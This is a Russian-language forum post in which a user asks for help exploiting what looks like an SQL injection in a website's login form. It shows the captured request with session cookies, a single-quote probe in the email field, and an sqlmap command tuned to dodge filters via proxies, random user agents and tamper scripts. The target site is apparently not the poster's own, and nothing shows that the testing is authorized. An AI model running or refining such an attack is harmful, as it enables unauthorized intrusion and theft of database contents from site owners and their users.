Показать сообщение отдельно

  #8  
Старый 11.07.2017, 10:05
SadBlackFox
Новичок
Регистрация: 02.07.2017
Сообщений: 3
С нами: 4666646

Репутация: 0
По умолчанию

Не получается раскрутить уязвимость(это же уязвимость?)

Ошибка: https://s8.hostingkartinok.com/uploa...115e042fec.png

POST такой:

.SpoilerTarget" type="button">Spoiler
Заголовки:

Код:
Host: site.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: site.ru/page
Cookie: __cfduid=d6db872199804f625c490305153453b1b1499733704; PHPSESSID=0881abe8mvn1a6uov3sod7mps6; language=ru; currency=RUB; gameboxmp2.net=true; viewed=423
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Тело:

Код:
Content-Type: multipart/form-data; boundary=---------------------------29948882417335
Content-Length: 249

-----------------------------29948882417335
Content-Disposition: form-data; name="email"

'
-----------------------------29948882417335
Content-Disposition: form-data; name="password"

00000000
-----------------------------29948882417335--
Пытаюсь вот так, я наверное неправильно --data оформляю

Код:
sqlmap.py -u "site.ru/page" --proxy-file="proxy.txt" --random-agent --time-sec=10 --delay=1 --tamper="between,randomcase,space2comment" --dbms=mysql --level=5 --risk=1 -v3 --data="???"
 
Ответить с цитированием